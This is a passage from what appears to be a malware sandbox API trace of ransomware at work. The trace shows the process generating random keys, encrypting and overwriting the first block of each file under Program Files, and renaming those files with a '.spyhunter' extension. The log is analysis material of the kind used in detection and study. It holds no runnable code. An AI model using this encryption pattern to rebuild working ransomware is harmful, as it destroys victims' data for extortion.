dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.519] GetProcessHeap () returned 0x2c0000 [0092.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.519] GetProcessHeap () returned 0x2c0000 [0092.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37a750 | out: hHeap=0x2c0000) returned 1 [0092.519] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdc8 | out: pbBuffer=0x248fdc8) returned 1 [0092.519] GetProcessHeap () returned 0x2c0000 [0092.519] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.519] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fdc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fdc0*=0x30) returned 1 [0092.519] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.523] GetProcessHeap () returned 0x2c0000 [0092.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.523] GetProcessHeap () returned 0x2c0000 [0092.523] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a260 | out: hHeap=0x2c0000) returned 1 [0092.524] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdc0 | out: pbBuffer=0x248fdc0) returned 1 [0092.524] GetProcessHeap () returned 0x2c0000 [0092.524] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.524] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fdb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fdb8*=0x30) returned 1 [0092.524] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\FlipPage\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\flippage\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.528] GetProcessHeap () returned 0x2c0000 [0092.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.528] GetProcessHeap () returned 0x2c0000 [0092.529] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3780d8 | out: hHeap=0x2c0000) returned 1 [0092.529] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdc0 | out: pbBuffer=0x248fdc0) returned 1 [0092.529] GetProcessHeap () returned 0x2c0000 [0092.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.529] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fdb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fdb8*=0x30) returned 1 [0092.529] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0092.548] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll") returned 75 [0092.548] StrStrW (lpFirst="VSTOLoader.dll", lpSrch=".txt") returned 0x0 [0092.548] GetProcessHeap () returned 0x2c0000 [0092.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c238e0 [0092.549] ReadFile (in: hFile=0xcc, lpBuffer=0x2c238e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fd7c, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesRead=0x248fd7c*=0x2800, lpOverlapped=0x0) returned 1 [0092.578] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.578] WriteFile (in: hFile=0xcc, lpBuffer=0x2c238e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fd7c, lpOverlapped=0x0 | out: lpBuffer=0x2c238e0*, lpNumberOfBytesWritten=0x248fd7c*=0x2800, lpOverlapped=0x0) returned 1 [0092.579] GetProcessHeap () returned 0x2c0000 [0092.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c238e0 | out: hHeap=0x2c0000) returned 1 [0092.579] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.579] WriteFile (in: hFile=0xcc, lpBuffer=0x248fdbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fd7c, lpOverlapped=0x0 | out: lpBuffer=0x248fdbc*, lpNumberOfBytesWritten=0x248fd7c*=0x4, lpOverlapped=0x0) returned 1 [0092.650] WriteFile (in: hFile=0xcc, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fd7c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fd7c*=0x30, lpOverlapped=0x0) returned 1 [0092.650] CloseHandle (hObject=0xcc) returned 1 [0092.669] GetProcessHeap () returned 0x2c0000 [0092.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0092.669] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll.spyhunter") returned 85 [0092.669] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VSTO\\10.0\\VSTOLoader.dll.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\10.0\\vstoloader.dll.spyhunter")) returned 1 [0092.670] GetProcessHeap () returned 0x2c0000 [0092.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0092.670] GetProcessHeap () returned 0x2c0000 [0092.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.670] GetProcessHeap () returned 0x2c0000 [0092.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346b88 | out: hHeap=0x2c0000) returned 1 [0092.686] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdb8 | out: pbBuffer=0x248fdb8) returned 1 [0092.686] GetProcessHeap () returned 0x2c0000 [0092.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.686] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fdb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fdb0*=0x30) returned 1 [0092.686] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\gbcbig.shx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0092.686] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX") returned 80 [0092.686] StrStrW (lpFirst="GBCBIG.SHX", lpSrch=".txt") returned 0x0 [0092.686] GetProcessHeap () returned 0x2c0000 [0092.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c21098 [0092.686] ReadFile (in: hFile=0x174, lpBuffer=0x2c21098, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fd74, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesRead=0x248fd74*=0x2800, lpOverlapped=0x0) returned 1 [0092.700] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.700] WriteFile (in: hFile=0x174, lpBuffer=0x2c21098*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fd74, lpOverlapped=0x0 | out: lpBuffer=0x2c21098*, lpNumberOfBytesWritten=0x248fd74*=0x2800, lpOverlapped=0x0) returned 1 [0092.700] GetProcessHeap () returned 0x2c0000 [0092.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21098 | out: hHeap=0x2c0000) returned 1 [0092.701] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.701] WriteFile (in: hFile=0x174, lpBuffer=0x248fdb4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fd74, lpOverlapped=0x0 | out: lpBuffer=0x248fdb4*, lpNumberOfBytesWritten=0x248fd74*=0x4, lpOverlapped=0x0) returned 1 [0092.716] WriteFile (in: hFile=0x174, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fd74, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fd74*=0x30, lpOverlapped=0x0) returned 1 [0092.716] CloseHandle (hObject=0x174) returned 1 [0092.769] GetProcessHeap () returned 0x2c0000 [0092.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0092.769] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX.spyhunter") returned 90 [0092.769] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\gbcbig.shx"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Visio Shared\\Fonts\\GBCBIG.SHX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\visio shared\\fonts\\gbcbig.shx.spyhunter")) returned 1 [0092.770] GetProcessHeap () returned 0x2c0000 [0092.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0092.770] GetProcessHeap () returned 0x2c0000 [0092.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.770] GetProcessHeap () returned 0x2c0000 [0092.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ed88 | out: hHeap=0x2c0000) returned 1 [0092.770] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdb8 | out: pbBuffer=0x248fdb8) returned 1 [0092.770] GetProcessHeap () returned 0x2c0000 [0092.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.770] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fdb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fdb0*=0x30) returned 1 [0092.770] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.770] GetProcessHeap () returned 0x2c0000 [0092.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.771] GetProcessHeap () returned 0x2c0000 [0092.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f8c8 | out: hHeap=0x2c0000) returned 1 [0092.771] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdb0 | out: pbBuffer=0x248fdb0) returned 1 [0092.771] GetProcessHeap () returned 0x2c0000 [0092.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.771] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fda8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fda8*=0x30) returned 1 [0092.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.771] GetProcessHeap () returned 0x2c0000 [0092.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.771] GetProcessHeap () returned 0x2c0000 [0092.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x355698 | out: hHeap=0x2c0000) returned 1 [0092.771] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fdb0 | out: pbBuffer=0x248fdb0) returned 1 [0092.771] GetProcessHeap () returned 0x2c0000 [0092.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.771] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fda8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fda8*=0x30) returned 1 [0092.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.771] GetProcessHeap () returned 0x2c0000 [0092.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.771] GetProcessHeap () returned 0x2c0000 [0092.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f7d8 | out: hHeap=0x2c0000) returned 1 [0092.772] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fda8 | out: pbBuffer=0x248fda8) returned 1 [0092.772] GetProcessHeap () returned 0x2c0000 [0092.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.772] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fda0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fda0*=0x30) returned 1 [0092.772] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\menu_style_default_Thumbnail.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\menu_style_default_thumbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.776] GetProcessHeap () returned 0x2c0000 [0092.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.776] GetProcessHeap () returned 0x2c0000 [0092.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f6e8 | out: hHeap=0x2c0000) returned 1 [0092.776] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fda8 | out: pbBuffer=0x248fda8) returned 1 [0092.776] GetProcessHeap () returned 0x2c0000 [0092.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.776] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fda0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fda0*=0x30) returned 1 [0092.776] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Title_mainImage-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\title_mainimage-mask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.777] GetProcessHeap () returned 0x2c0000 [0092.777] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.778] GetProcessHeap () returned 0x2c0000 [0092.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f418 | out: hHeap=0x2c0000) returned 1 [0092.778] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fda0 | out: pbBuffer=0x248fda0) returned 1 [0092.778] GetProcessHeap () returned 0x2c0000 [0092.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.778] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fd98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fd98*=0x30) returned 1 [0092.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\scrapbook.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\scrapbook.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.778] GetProcessHeap () returned 0x2c0000 [0092.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.778] GetProcessHeap () returned 0x2c0000 [0092.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e560 | out: hHeap=0x2c0000) returned 1 [0092.778] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fda0 | out: pbBuffer=0x248fda0) returned 1 [0092.778] GetProcessHeap () returned 0x2c0000 [0092.778] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.778] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fd98*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fd98*=0x30) returned 1 [0092.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_content-background.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_content-background.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.778] GetProcessHeap () returned 0x2c0000 [0092.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.778] GetProcessHeap () returned 0x2c0000 [0092.778] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3553b0 | out: hHeap=0x2c0000) returned 1 [0092.778] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd98 | out: pbBuffer=0x248fd98) returned 1 [0092.778] GetProcessHeap () returned 0x2c0000 [0092.779] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.779] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fd90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fd90*=0x30) returned 1 [0092.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Notes_btn-back-static.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\notes_btn-back-static.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.814] GetProcessHeap () returned 0x2c0000 [0092.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.814] GetProcessHeap () returned 0x2c0000 [0092.814] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f238 | out: hHeap=0x2c0000) returned 1 [0092.814] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd98 | out: pbBuffer=0x248fd98) returned 1 [0092.814] GetProcessHeap () returned 0x2c0000 [0092.814] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.814] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fd90*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fd90*=0x30) returned 1 [0092.814] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0092.815] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM") returned 74 [0092.815] StrStrW (lpFirst="VBHW6.CHM", lpSrch=".txt") returned 0x0 [0092.815] GetProcessHeap () returned 0x2c0000 [0092.815] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c26128 [0092.815] ReadFile (in: hFile=0x17c, lpBuffer=0x2c26128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fd54, lpOverlapped=0x0 | out: lpBuffer=0x2c26128*, lpNumberOfBytesRead=0x248fd54*=0x2800, lpOverlapped=0x0) returned 1 [0092.817] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.817] WriteFile (in: hFile=0x17c, lpBuffer=0x2c26128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fd54, lpOverlapped=0x0 | out: lpBuffer=0x2c26128*, lpNumberOfBytesWritten=0x248fd54*=0x2800, lpOverlapped=0x0) returned 1 [0092.818] GetProcessHeap () returned 0x2c0000 [0092.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c26128 | out: hHeap=0x2c0000) returned 1 [0092.818] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.818] WriteFile (in: hFile=0x17c, lpBuffer=0x248fd94*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fd54, lpOverlapped=0x0 | out: lpBuffer=0x248fd94*, lpNumberOfBytesWritten=0x248fd54*=0x4, lpOverlapped=0x0) returned 1 [0092.818] WriteFile (in: hFile=0x17c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fd54, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fd54*=0x30, lpOverlapped=0x0) returned 1 [0092.818] CloseHandle (hObject=0x17c) returned 1 [0092.820] GetProcessHeap () returned 0x2c0000 [0092.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3867e8 [0092.821] wnsprintfW (in: pszDest=0x3867e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.spyhunter") returned 84 [0092.821] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBHW6.CHM.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbhw6.chm.spyhunter")) returned 1 [0092.821] GetProcessHeap () returned 0x2c0000 [0092.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3867e8 | out: hHeap=0x2c0000) returned 1 [0092.822] GetProcessHeap () returned 0x2c0000 [0092.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0092.822] GetProcessHeap () returned 0x2c0000 [0092.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346aa8 | out: hHeap=0x2c0000) returned 1 [0092.822] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fd90 | out: pbBuffer=0x248fd90) returned 1 [0092.822] GetProcessHeap () returned 0x2c0000 [0092.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0092.822] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fd88*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fd88*=0x30) returned 1 [0092.822] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbendf98.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0092.822] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBENDF98.CHM") returned 77 [0092.822] StrStrW (lpFirst="VBENDF98.CHM", lpSrch=".txt") returned 0x0 [0092.822] GetProcessHeap () returned 0x2c0000 [0092.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c26128 [0092.822] ReadFile (in: hFile=0x17c, lpBuffer=0x2c26128, nNumberOfBytesToRead=0x2800, 